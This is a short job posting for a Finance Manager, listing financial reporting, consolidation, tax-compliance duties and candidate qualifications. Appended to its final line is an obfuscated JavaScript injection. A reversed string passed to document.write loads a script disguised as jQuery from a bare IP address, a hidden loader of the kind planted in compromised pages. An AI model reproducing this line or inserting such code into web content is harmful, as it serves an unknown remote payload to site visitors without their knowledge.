Industry : Financing
– Timely and periodic reporting including financial and management reports, statutory report, project report, expense report, KPI report and others as advised by Management.
– Ensure monthly financial closing of financial statements (P/L; revenue and costs) and B/S (assets, liabilities and equity) in an accurate, complete and timely manner.
– Prepare consolidated financial statements for the Group.
– Identify and follow up on variances noted and potential issues with relevant stakeholders for resolution.
– Ensure compliance with statutory requirements in relation to income tax legislation.
– Assist in the formulation of financial policies, rules and accounting procedures.
– Assist in strategic planning and corporate exercises e.g. acquisitions and restructuring.
– Candidate must possess at least Bachelor’s Degree/Post Graduate Diploma/Professional Degree in Finance / Accountancy / Banking or equivalent
– Proven experience as a Finance Manager or similar leadership role
– Able to lead and coach team members
– Able to communicate in Mandarin is an advantage document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))